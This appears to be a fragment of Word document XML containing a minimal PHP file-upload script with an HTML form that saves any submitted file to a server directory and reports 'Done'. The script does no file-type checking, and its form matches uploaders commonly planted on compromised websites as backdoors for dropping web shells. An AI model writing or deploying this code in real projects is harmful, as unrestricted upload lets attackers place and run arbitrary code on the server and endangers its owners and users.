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isset($_POST['Submit'])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filedir = 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axfile = '200000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serfile_name = $_FILES['image']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serfile_tmp = $_FILES['image']['tmp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_FILES['image']['nam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bod = $filedir.$userfil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ove_uploaded_file($userfile_tmp, $ab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"&lt;center&gt;&lt;b&gt;Done ==&gt; $userfile_name&lt;/b&gt;&lt;/cente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' </w:t>
        <w:tab/>
        <w:t xml:space="preserve">&lt;form method="POST" action="" enctype="multipart/form-dat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file" name="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Submit" name="Submit" valu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form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